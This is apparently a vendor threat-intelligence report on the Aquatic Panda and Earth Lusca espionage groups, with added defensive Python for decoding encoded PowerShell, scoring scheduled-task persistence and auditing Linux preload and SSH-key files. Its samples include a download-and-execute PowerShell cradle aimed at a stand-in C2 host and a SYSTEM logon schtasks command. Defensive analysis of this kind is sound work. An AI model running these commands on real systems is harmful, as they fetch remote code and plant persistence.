Overview
Aquatic Panda, a China-linked advanced persistent threat (APT) group, has been actively conducting cyber espionage and intelligence-gathering operations since at least May 2020. The group primarily targets telecommunications providers, technology firms, and government entities, aligning its operations with strategic intelligence objectives.
A closely related activity has also been observed under the cluster known as Earth Lusca, another Chinese cyber espionage group active since April 2019. While Earth Lusca has leveraged malware families historically associated with groups such as APT41, analysts assess that its infrastructure and operational patterns remain distinct. Together, these overlapping clusters demonstrate a broad, coordinated approach to global intelligence collection.

Aquatic Panda operators rely heavily on a mix of commodity and custom tooling, including frameworks like Cobalt Strike and Brute Ratel. A notable component of their toolkit is a downloader referred to as FishMaster, which is frequently used to stage secondary payloads such as njRAT. This layered approach allows the group to maintain flexibility while scaling operations across multiple targets and regions.
Attribution and Operational Origin
Aquatic Panda is assessed to originate from China, with activity primarily concentrated across the Asia-Pacific region but extending globally. Its targeting behavior, infrastructure reuse, and tooling overlap strongly suggest alignment with broader state-sponsored intelligence collection objectives.

Beyond industry reporting, Aquatic Panda has also been formally referenced by U.S. law enforcement. The Federal Bureau of Investigation (FBI) has publicly identified Aquatic Panda cyber threat actors in connection with cyber-enabled criminal activity, including conspiracy to commit computer fraud and wire fraud, which underscores the group’s relevance to ongoing investigations and its significance within the global threat landscape.

Separate reporting has also highlighted the broader ecosystem supporting such activity. Between approximately 2016 and 2023, the Chinese technology company Anxun Information Technology Co., Ltd. (“i-Soon”) was allegedly involved in coordinated intrusion activity under direction from Chinese state security services, including the Ministry of State Security (MSS) and Ministry of Public Security (MPS).
i-Soon reportedly operated multiple intrusion teams targeting global victims, including government agencies, dissident groups, media organizations, and private-sector entities. This broader ecosystem provides important context for understanding how groups like Aquatic Panda may operate within a larger contractor- and state-aligned cyber infrastructure.
Targeting Profile
Aquatic Panda demonstrates a wide targeting scope, focusing on industries that provide strategic, economic, or political intelligence value. Key sectors include:
- Aerospace and Defense
- Banking, Financial Services, and Insurance (BFSI)
- Education
- Government and Law Enforcement Agencies
- Healthcare
- Media and Entertainment
- Professional Services
- Technology
- Telecommunications
The breadth of these targets indicates a dual emphasis on both national security intelligence and economic espionage.
Tooling and Malware Ecosystem

Aquatic Panda employs a diverse malware ecosystem, combining legitimate administrative tools, open-source frameworks, and custom-developed implants. At least 14 malware families and utilities have been associated with the group.
Prominent tools include:
- Cobalt Strike (post-exploitation framework)
- Brute Ratel (backdoor framework)
- BIOPASS RAT (custom backdoor)
- FishMaster (downloader)
- FunnySwitch (loader)
- njRAT (commodity remote access trojan)
- ShadowPad (modular backdoor platform)
- Winnti (variants for both Windows and Linux environments)
Additional utilities such as certutil, nbtscan, and wevtutil are used for system interaction, reconnaissance, and data manipulation. Tunneling tools like EarthWorm and FRP enable covert communication channels, helping attackers bypass network defenses.
This blend of tools reflects a pragmatic strategy: leveraging proven, widely available frameworks while supplementing them with custom components to evade detection and maintain persistence.
Initial Access and Execution Techniques
Aquatic Panda and associated Earth Lusca operations rely on multiple initial access vectors. These include:
- Drive-by compromise (T1189): Watering hole attacks targeting frequently visited websites.
- Exploitation of public-facing applications (T1190): Direct attacks against vulnerable servers, including Microsoft Exchange and Oracle GlassFish.
- Spearphishing links (T1566.002): Emails containing malicious URLs designed to lure victims into executing payloads.
Execution techniques vary depending on the environment. In Windows systems, the group has used Windows Management Instrumentation (WMI) for lateral movement and PowerShell to execute Base64-encoded commands and retrieve additional payloads. There have also been attempts to execute Bash commands through the Windows command shell (cmd /C), indicating occasional cross-platform experimentation.
In Linux environments, attackers deploy malicious shell scripts following SSH access, often to install Linux variants of Winnti malware. Social engineering remains central to execution, with users frequently required to click on malicious links or open weaponized files to trigger loaders.
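The Base64-encoded PowerShell execution described above is easy to decode on the defender's side because PowerShell's -EncodedCommand argument is always UTF-16LE text wrapped in Base64. The following Python is an added example, not Cyble's code or tooling from the original report: it scans constructed process-creation command lines for the -EncodedCommand switch and its abbreviations, decodes the script, and flags download-and-execute indicators. The sample lines, the indicator list and the c2.invalid host are constructed for the demonstration.

```python
"""Decode and triage Base64-encoded PowerShell command lines (T1059.001, T1027.010).

Added example, not Cyble's code. The command lines below are constructed
samples; the C2 host uses the reserved .invalid TLD.
"""
import base64
import binascii

SWITCH_NAME = "encodedcommand"

# Substrings worth alerting on inside a decoded script: download cradles,
# in-memory execution and nested decoding (assumed list; tune to taste).
SUSPICIOUS = (
    "Invoke-Expression", "IEX", "DownloadString", "DownloadFile",
    "Net.WebClient", "Invoke-WebRequest", "FromBase64String",
)


def is_encoded_switch(token: str) -> bool:
    """True for -EncodedCommand and the abbreviations PowerShell accepts
    (-e, -ec, -enc, ...): any leading substring of the full switch name.
    -ExecutionPolicy, -ea and similar do not match."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    return SWITCH_NAME.startswith(token[1:].lower())


def decode_encoded_command(b64: str):
    """Decode the UTF-16LE script PowerShell expects after -EncodedCommand.
    Returns None when the argument is not valid Base64 or not UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def extract_encoded_script(cmdline: str):
    """Locate the first encoded-command switch and decode its argument.
    Whitespace splitting suffices here: Base64 never contains spaces."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_switch(tok):
            return decode_encoded_command(tokens[i + 1].strip('"\''))
    return None


def triage(cmdline: str) -> dict:
    """Report whether the line carried an encoded script, the decoded text,
    and which suspicious indicators the decoded text contains."""
    script = extract_encoded_script(cmdline)
    hits = []
    if script is not None:
        lowered = script.lower()
        hits = [s for s in SUSPICIOUS if s.lower() in lowered]
    return {"encoded": script is not None, "script": script, "indicators": hits}


def encode_for_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects it (UTF-16LE, then Base64);
    used here only to build the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not real telemetry).
SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -Command "Get-Date"',
    "powershell.exe -nop -w hidden -enc "
    + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage')"
    ),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        verdict = "ALERT" if result["indicators"] else ("decoded" if result["encoded"] else "plain")
        print(f"{verdict:8} {line[:60]}")
        if result["script"]:
            print("  decoded:", result["script"])
```

The prefix match in is_encoded_switch matters in practice: operators rarely spell out -EncodedCommand, and a rule that only looks for the full switch name misses -e and -enc. Running the decoder inline in a detection pipeline also lets the indicator match operate on the plaintext script rather than on the opaque Base64 string.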
Persistence and Credential Access
To maintain long-term access, Aquatic Panda employs several persistence mechanisms. Earth Lusca activity has demonstrated the use of scheduled tasks, specifically leveraging commands such as:
schtasks /Create /SC ONLOGON /TN WindowsUpdateCheck /TR "file path" /ru system
With the ONLOGON trigger and /ru system, the payload runs as SYSTEM at every user logon, so the foothold survives system reboots.
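The schtasks command above carries several signals a defender can score directly from process-creation telemetry: a logon trigger, a SYSTEM run-as, an action outside trusted directories, and a task name that imitates a Windows component. The Python below is an added example, not code from Cyble or the original report; it parses constructed schtasks /Create command lines and returns the reasons each one deserves review. The trusted-directory and masquerade-word lists are assumptions to be tuned to an organisation's own build standard.

```python
"""Triage schtasks /Create command lines for persistence indicators (T1053).

Added example, not Cyble's code. The sample lines are constructed; the
trusted-directory and masquerade-word lists are assumptions.
"""
import ntpath
import re

TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# Triggers that fire with no user interaction and survive reboots; the command
# quoted above uses /SC ONLOGON.
PERSISTENT_TRIGGERS = {"ONLOGON", "ONSTART"}
# Directories from which a task action is expected to run (assumption).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Name fragments chosen to imitate real maintenance tasks (assumption).
MASQUERADE_WORDS = ("update", "windows", "microsoft", "defender", "security")


def parse_switches(cmdline: str) -> tuple:
    """Split a command line into (image, {SWITCH: value}). Switches are
    case-insensitive and use '/' or '-'; a switch immediately followed by
    another switch (e.g. /Create /SC) is stored with the value True."""
    tokens = TOKEN_RE.findall(cmdline)
    image = tokens[0].strip('"') if tokens else ""
    switches = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok[0] in "/-":
            nxt = tokens[i + 1] if i + 1 < len(tokens) else None
            if nxt is not None and nxt[0] not in "/-":
                switches[tok[1:].upper()] = nxt.strip('"')
                i += 2
                continue
            switches[tok[1:].upper()] = True
        i += 1
    return image, switches


def assess_task(cmdline: str):
    """Return a review record for a schtasks /Create line, or None for any
    other command line. Each reason is one signal a defender would weigh."""
    image, sw = parse_switches(cmdline)
    if ntpath.basename(image).lower() not in ("schtasks", "schtasks.exe") or "CREATE" not in sw:
        return None

    def value(key: str) -> str:
        v = sw.get(key)
        return v if isinstance(v, str) else ""

    name, trigger, run_as, action = value("TN"), value("SC").upper(), value("RU"), value("TR")
    reasons = []
    if trigger in PERSISTENT_TRIGGERS:
        reasons.append(f"trigger {trigger} runs without user interaction")
    if run_as.lower() in ("system", "nt authority\\system"):
        reasons.append("runs as SYSTEM via /ru")
    # Only the leading path of the action is judged; arguments may follow it.
    if action and not action.lower().startswith(TRUSTED_DIRS):
        reasons.append(f"action outside trusted directories: {action}")
    if any(w in name.lower() for w in MASQUERADE_WORDS):
        reasons.append(f"task name imitates a Windows component: {name}")
    return {"task_name": name, "trigger": trigger, "run_as": run_as,
            "action": action, "reasons": reasons}


# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_LINES = [
    r'schtasks.exe /Create /SC ONLOGON /TN WindowsUpdateCheck /TR "C:\Users\Public\update.exe" /ru system',
    r'schtasks.exe /Create /SC DAILY /ST 02:00 /TN NightlyBackup /TR "C:\Program Files\Backup\backup.exe" /ru Administrator',
    r"schtasks.exe /Query /TN NightlyBackup",
    r"cmd.exe /c whoami",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        record = assess_task(line)
        if record is None:
            continue
        print(record["task_name"], "->", record["reasons"] or ["no persistence indicators"])
```

Scoring on several independent signals rather than on any one of them keeps the alert volume manageable: a SYSTEM task from C:\Program Files with a descriptive name is routine, while a SYSTEM logon task launching a binary from a user-writable directory under a Windows-sounding name is the pattern worth an analyst's time.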
Credential access is another critical component of operations. Aquatic Panda captures valid domain accounts through multiple methods, enabling lateral movement and access to additional systems. The use of legitimate credentials reduces the likelihood of detection and facilitates deeper network penetration.
Lateral Movement and Post-Exploitation Behavior
Once inside a network, Aquatic Panda expands its foothold using a combination of credential reuse and system-level tools. WMI is frequently used for remote execution, while tunneling tools provide secure pathways for command-and-control communication.
The group’s reliance on frameworks like Cobalt Strike allows operators to dynamically deploy modules for reconnaissance, privilege escalation, and data exfiltration. Meanwhile, tools such as nbtscan assist in identifying network shares and mapping internal infrastructure.
Conclusion
Aquatic Panda has operated as a persistent and adaptive cyber espionage actor since its emergence in 2020. Its ability to combine widely available tools with custom-developed malware enables scalable, resilient operations across multiple sectors. The overlap with clusters such as Earth Lusca further underscores the complexity of attribution within China’s broader cyber ecosystem.
The group’s use of diverse initial access techniques, cross-platform tooling, and credential-driven lateral movement reflects a mature operational model focused on stealth, persistence, and long-term intelligence collection.

Cyble assesses that such campaigns highlight the need for continuous, intelligence-led defense strategies powered by real-time visibility and proactive threat hunting.
Recommendations and Mitigation Strategies
- Strengthen email security controls by deploying advanced phishing detection, URL rewriting, and attachment sandboxing to reduce the risk of spearphishing-driven initial access (T1566.002).
- Patch and harden internet-facing applications such as Microsoft Exchange, Oracle GlassFish, and other public-facing services to mitigate exploitation attempts (T1190).
- Implement strict PowerShell and scripting restrictions, including logging, Constrained Language Mode, and script block monitoring to detect malicious encoded command execution.
- Restrict and monitor the use of administrative utilities such as WMI, certutil, and wevtutil, as these are frequently abused for execution and reconnaissance in Aquatic Panda operations.
- Deploy endpoint detection and response (EDR) solutions capable of identifying credential dumping tools such as Mimikatz, LSASS access attempts, and abnormal authentication patterns.
- Enforce multi-factor authentication (MFA) across all privileged accounts and remote access systems to reduce the impact of stolen credentials and domain account abuse (T1078.002).
- Segment internal networks and limit lateral movement pathways, especially restricting SMB traffic and unnecessary administrative shares to contain post-compromise spread.
- Monitor for suspicious scheduled task creation and persistence mechanisms, including unusual use of schtasks commands and registry-based autoruns.
- Detect and block known adversary tooling and frameworks, including Cobalt Strike, Brute Ratel, ShadowPad, and njRAT through signature-based and behavioral detection methods.
- Enhance threat hunting and network visibility, focusing on anomalous tunneling activity (e.g., EarthWorm, FRP), unusual outbound connections, and encrypted C2 traffic over standard web protocols.
MITRE ATT&CK Techniques Associated with Aquatic Panda

- Drive-by Compromise (T1189): Earth Lusca conducts watering hole attacks to deliver malicious payloads via compromised or lured websites.
- Exploit Public-Facing Application (T1190): Earth Lusca exploits vulnerabilities in internet-facing systems such as Microsoft Exchange and Oracle GlassFish to gain initial access.
- Spearphishing Link (T1566.002): Earth Lusca uses phishing emails containing malicious URLs to trick users into triggering infection chains.
- Malicious Link (T1204.001): Users are directed to click on malicious links that load decoy documents and execute malware loaders.
- Malicious File (T1204.002): Victims are required to open weaponized files that activate embedded payloads and loaders.
- Windows Management Instrumentation (T1047): Aquatic Panda uses WMI for remote execution and lateral movement within compromised environments.
- PowerShell (T1059.001): Execution of Base64-encoded commands and script-based payload retrieval through PowerShell.
- Windows Command Shell (T1059.003): Attempts to execute cross-platform commands via cmd /C on Windows systems.
- Unix Shell (T1059.004): Use of malicious shell scripts in Linux environments following SSH access to deploy Winnti variants.
- Scheduled Task/Job (T1053): Earth Lusca establishes persistence using scheduled tasks that trigger malware execution at logon.
- Domain Accounts (T1078.002): Aquatic Panda uses stolen domain credentials to maintain access and enable lateral movement.
- SSH Authorized Keys (T1098.004): Earth Lusca implants SSH keys in /root/.ssh for persistent remote access.
- Windows Service (T1543.003): Aquatic Panda creates disguised services to maintain persistence under legitimate-looking names.
- Print Processors (T1547.012): Earth Lusca abuses Windows Print Processor registry keys to load malicious DLLs at system startup.
- DLL Search Order Hijacking (T1574.001): Aquatic Panda abuses trusted Windows binaries to load malicious DLL, EXE, and DAT payloads.
- Dynamic Linker Hijacking (T1574.006): Modification of Linux ld.so.preload to persist Winnti malware on Unix systems.
- Bypass User Account Control (T1548.002): Earth Lusca uses Fodhelper-based UAC bypass techniques to gain elevated privileges.
- Command Obfuscation (T1027.010): Aquatic Panda encodes PowerShell commands in Base64 to evade detection.
- Masquerade Task or Service (T1036.004): Creation of fake services such as “Windows User Service” to blend with legitimate processes.
- Match Legitimate Resource Name or Location (T1036.005): Renaming or relocating malicious binaries into trusted system paths.
- Clear Windows Event Logs (T1070.001): Deletion of Windows logs to remove forensic traces of activity.
- Clear Command History (T1070.003): Removal of Linux shell history to conceal executed commands.
- File Deletion (T1070.004): Deletion of malware binaries after execution or staging.
- Modify Registry (T1112): Registry changes enabling RestrictedAdmin mode for pass-the-hash RDP authentication.
- Deobfuscate/Decode Files or Information (T1140): Use of certutil to decode and reconstruct malicious payloads.
- Rundll32 (T1218.011): Execution of malicious DLLs via rundll32, including keylogging components.
- Disable or Modify Tools (T1562.001): Attempts to disable endpoint detection and response (EDR) solutions.
- LSASS Memory (T1003.001): Credential harvesting through LSASS memory dumping.
- System Service Discovery (T1007): Identification of installed security and EDR services.
- System Network Configuration Discovery (T1016): Use of ipconfig to gather network configuration details.
- Remote System Discovery (T1018): PowerShell-based log analysis and scanning to identify active systems and connections.
- System Owner/User Discovery (T1033): Enumeration of recently logged-in users on compromised systems.
- System Network Connections Discovery (T1049): Use of netstat and event log parsing to identify active connections.
- Process Discovery (T1057): Use of tasklist to enumerate running processes.
- System Information Discovery (T1082): Execution of native OS commands to identify system and privilege details.
- Account Discovery (T1087): Use of Linux last command to identify recent user logins.
- Domain Trust Discovery (T1482): Use of nltest to enumerate domain controller relationships.
- Security Software Discovery (T1518.001): Attempts to identify installed endpoint protection tools.
- Log Enumeration (T1654): Analysis of authentication logs prior to selective deletion.
- Remote Services (T1021): Use of scheduled tasks and remote execution for lateral movement.
- Remote Desktop Protocol (T1021.001): Use of stolen credentials for RDP-based lateral movement.
- SMB/Windows Admin Shares (T1021.002): Movement through administrative shares across internal networks.
- SSH (T1021.004): Use of compromised SSH credentials for Linux-based lateral movement.
- Exploitation of Remote Services (T1210): Use of ZeroLogon and related exploits against domain controllers.
- Pass the Hash (T1550.002): Use of RestrictedAdmin mode to authenticate via hash-based RDP sessions.
- Data from Local System (T1005): Extraction of local event logs using wevtutil for intelligence collection.
- Archive via Utility (T1560.001): Use of WinRAR and 7-Zip to compress data before exfiltration.
- Exfiltration to Cloud Storage (T1567.002): Use of MEGAcmd to upload stolen data to MEGA cloud storage.
- Proxy (T1090): Use of Cloudflare infrastructure to mask command-and-control traffic.
- Ingress Tool Transfer (T1105): Download and deployment of additional malware onto compromised systems.
- Domains (T1583.001): Registration of spoofed domains for watering hole and phishing operations.
- Server (T1583.004): Acquisition of dedicated servers for segmented operational roles.
- Web Services (T1583.006): Use of GitHub accounts to host and distribute malicious tooling.
- Compromised Infrastructure (T1584.004): Use of hijacked web servers for staging malware.
- Compromised Web Services (T1584.006): Abuse of Google Drive repositories for hosting payloads.
- Malware (T1588.001): Use of njRAT in operational deployments.
- Tool (T1588.002): Use of Cobalt Strike for post-exploitation activity.
- Upload Malware (T1608.001): Staging malicious files across GitHub, Google Drive, and compromised servers.
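Two of the Linux persistence techniques in the list above, modification of ld.so.preload (T1574.006) and implanted SSH keys in /root/.ssh (T1098.004), leave artifacts that a host audit can check deterministically. The Python below is an added example, not Cyble's code: it audits an ld.so.preload file against an allowlist and classifies every authorized_keys entry by OpenSSH-style SHA256 fingerprint as approved, unknown or malformed. File paths are parameters so the same functions run against a mounted triage image; the sample files, key blobs, allowlists and library-directory list are constructed for the demonstration.

```python
"""Audit two Linux persistence points from the technique list above:
ld.so.preload entries (T1574.006) and root's authorized_keys (T1098.004).

Added example, not Cyble's code. File paths are parameters so the same
functions run against a mounted triage image; the sample files, key blobs
and allowlists below are constructed for the demonstration.
"""
import base64
import binascii
import hashlib
import tempfile
from pathlib import Path

# Directories where preloaded libraries legitimately live (assumption; tune
# per distribution). A preload from /tmp, /dev/shm or a home directory is the
# classic sign of the technique.
LIBRARY_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")


def audit_ld_preload(path: str, allowlist=frozenset()) -> list:
    """One finding per preload entry not on the allowlist. glibc reads the
    file as a whitespace-separated list of shared objects injected into every
    dynamically linked process, so the expected state is absent or empty."""
    p = Path(path)
    if not p.is_file():
        return []
    return [
        {"library": lib, "present_on_disk": Path(lib).exists(),
         "outside_library_dirs": not lib.startswith(LIBRARY_DIRS)}
        for lib in p.read_text(errors="replace").split()
        if lib not in allowlist
    ]


def ssh_fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a public-key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(path: str, known_fingerprints=frozenset()) -> list:
    """Parse authorized_keys and classify each key as approved, unknown or
    malformed. Options such as from="..." may precede the key type, so the
    key-type token anchors the parse."""
    p = Path(path)
    if not p.is_file():
        return []
    findings = []
    for lineno, line in enumerate(p.read_text(errors="replace").splitlines(), 1):
        tokens = line.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        idx = next((i for i, t in enumerate(tokens)
                    if t.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        try:
            if idx is None:
                raise ValueError("no key type token")
            fp = ssh_fingerprint(tokens[idx + 1])
        except (ValueError, IndexError, binascii.Error):
            findings.append({"line": lineno, "status": "malformed"})
            continue
        findings.append({
            "line": lineno, "type": tokens[idx], "fingerprint": fp,
            "comment": " ".join(tokens[idx + 2:]), "has_options": idx > 0,
            "status": "approved" if fp in known_fingerprints else "unknown",
        })
    return findings


def constructed_ed25519_blob(seed: int) -> str:
    """Syntactically valid ssh-ed25519 blob built from a made-up 32-byte value
    (constructed for the demo; not a real key)."""
    def ssh_string(b: bytes) -> bytes:
        return len(b).to_bytes(4, "big") + b
    return base64.b64encode(ssh_string(b"ssh-ed25519")
                            + ssh_string(bytes(range(seed, seed + 32)))).decode()


def run_demo() -> dict:
    """Write constructed sample files to a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as d:
        preload = Path(d, "ld.so.preload")
        preload.write_text("/usr/lib/libapproved.so\n/dev/shm/.cache/libx.so\n")
        keys = Path(d, "authorized_keys")
        keys.write_text(
            f"ssh-ed25519 {constructed_ed25519_blob(0)} admin@jumphost\n"
            f'from="192.0.2.10" ssh-ed25519 {constructed_ed25519_blob(32)} backup\n'
            "garbage line without a key\n"
        )
        approved = frozenset({ssh_fingerprint(constructed_ed25519_blob(0))})
        return {
            "preload": audit_ld_preload(str(preload), allowlist=frozenset({"/usr/lib/libapproved.so"})),
            "keys": audit_authorized_keys(str(keys), known_fingerprints=approved),
        }


if __name__ == "__main__":
    for section, findings in run_demo().items():
        print(section)
        for finding in findings:
            print("  ", finding)
```

Comparing fingerprints rather than raw key lines means a key that has been re-added with different options or a changed comment is still recognised, while any key not issued through the organisation's provisioning process shows up as unknown. Pairing this check with the shell-history and log-clearing techniques in the list above is useful because the authorized_keys and ld.so.preload artifacts persist on disk even after the actor clears the evidence of how they were written.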